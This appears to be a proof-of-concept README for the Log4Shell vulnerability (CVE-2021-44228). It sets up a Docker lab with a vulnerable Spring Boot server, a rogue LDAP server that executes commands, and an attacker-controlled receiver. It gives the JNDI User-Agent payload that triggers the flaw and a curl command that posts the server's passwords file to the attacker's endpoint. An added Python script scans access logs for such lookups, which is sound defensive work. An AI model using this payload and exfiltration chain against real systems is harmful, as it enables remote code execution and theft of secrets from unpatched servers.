
CVE-2021-44228 PoC: Apache Log4j code issue vulnerability

Source
Related vulnerability
Title: Apache Log4j code issue vulnerability (CVE-2021-44228)
Description: Apache Log4j is a Java-based open-source logging tool from the Apache Software Foundation (USA). Apache Log4j has a code issue vulnerability: an attacker can craft a data request and send it to a server that uses Apache Log4j; when that request is written to the log, remote code execution is triggered.
Introduction
# CVE-2021-44228-docker-example

A simple demonstration of CVE-2021-44228 to transfer data from a vulnerable server to a web service controlled by an attacker.
All components involved are running via Docker.

## Components

### vulnerable-server
This is a standard Java server acting as the victim. It's running:
- Java `8u111`
- Web Application (Spring Boot 2.6.1)
- Log4J

**This server is `VULNERABLE` using this configuration.**

Additional Information:

- endpoint at `/logging` (GET) will log the user agent using Log4J
- `/foo/passwords.txt` exists (the attacker's target)

Content of `passwords.txt`:
```text
my secret
```

### malicious-receiver
This is a standard Java server acting as the data collector of the attacker. It's running:
- Java `17`
- Web Application (Spring Boot 2.6.1)

Additional information:

- endpoint at `/receiver` (POST) will log the request body

### malicious-ldap
This is an LDAP server powered by [rogue-jndi](https://github.com/veracode-research/rogue-jndi).
Its `ExportJava` class has been modified so that commands passed via the `-c` flag get executed.

```java
public ExportObject() {
    try {
        Runtime.getRuntime().exec(Config.command);
    } catch(Exception e) {
        e.printStackTrace();
    }
}
```

When requested by the vulnerable server it will respond with a class running the following command when instantiated:
```shell
curl -XPOST http://172.18.18.11:8082/receiver --data-binary @/foo/passwords.txt
```
This will effectively post the content of `/foo/passwords.txt` to the malicious receiver's prepared endpoint.

## Usage

1. setup Docker images by running:
   ```shell
   ./build.sh
   ```
2. start component containers by running:
   ```shell
   ./start.sh
   ```
3. trigger the vulnerability by running:
   ```shell
   curl -A '${jndi:ldap://172.18.18.10/o=reference}' localhost:8081/logging
   ```
4. check the logging output of the malicious receiver component by running:
   ```shell
   docker logs --timestamps docker_malicious-receiver_1
   ```
   The output should contain the content of the server's `passwords.txt` file.
5. stop component containers by running:
   ```shell
   ./stop.sh
   ```
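As an added defensive check that is not part of this repository: the script below scans web-server access logs for Log4j lookup expressions in the User-Agent, the header the `/logging` endpoint hands to Log4j in step 3. The log lines are constructed, the combined log format is an assumption about how the front-end server logs requests, and the extractor honours nested `${...}` so that each expression is reported whole rather than cut off at the first closing brace.

```python
import re
from typing import List, NamedTuple

# Constructed sample lines (combined log format); the last one carries the
# same User-Agent payload the demo above sends to /logging.
SAMPLE_LOG = """\
172.18.18.1 - - [10/Dec/2021:12:00:01 +0000] "GET /logging HTTP/1.1" 200 12 "-" "curl/7.79.1"
172.18.18.1 - - [10/Dec/2021:12:00:02 +0000] "GET /foo/passwords.txt HTTP/1.1" 200 9 "-" "Mozilla/5.0 (X11; Linux x86_64)"
172.18.18.1 - - [10/Dec/2021:12:00:03 +0000] "GET /logging HTTP/1.1" 200 12 "-" "${jndi:ldap://172.18.18.10/o=reference}"
"""

COMBINED = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                      r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')

class Finding(NamedTuple):
    ip: str
    path: str
    lookup: str    # the complete ${...} expression as received
    severity: str  # "critical" for a jndi: lookup, "suspicious" for any other

def extract_lookups(value: str) -> List[str]:
    """Return each complete ${...} expression in value, honouring nesting.
    Log4j 2 lookups may nest, so a depth counter keeps each one whole."""
    found, depth, start, i = [], 0, -1, 0
    while i < len(value):
        if value.startswith("${", i):
            if depth == 0:
                start = i
            depth += 1
            i += 2
            continue
        if value[i] == "}" and depth > 0:
            depth -= 1
            if depth == 0:
                found.append(value[start:i + 1])
        i += 1
    return found

def severity_of(lookup: str) -> str:
    # Lookup syntax in a client-supplied header is abnormal; jndi: is the RCE path.
    return "critical" if lookup[2:-1].lower().startswith("jndi:") else "suspicious"

def scan_log(text: str) -> List[Finding]:
    """Parse combined-format lines and report lookup expressions in the User-Agent."""
    findings = []
    for line in text.splitlines():
        m = COMBINED.match(line)
        if m:
            for lookup in extract_lookups(m["ua"]):
                findings.append(Finding(m["ip"], m["path"], lookup, severity_of(lookup)))
    return findings
```

Feed it the front-end server's access log instead of `SAMPLE_LOG` to spot requests that reached `/logging` with a lookup in the header; in this demo that is the single line the receiver's exfiltrated file corresponds to.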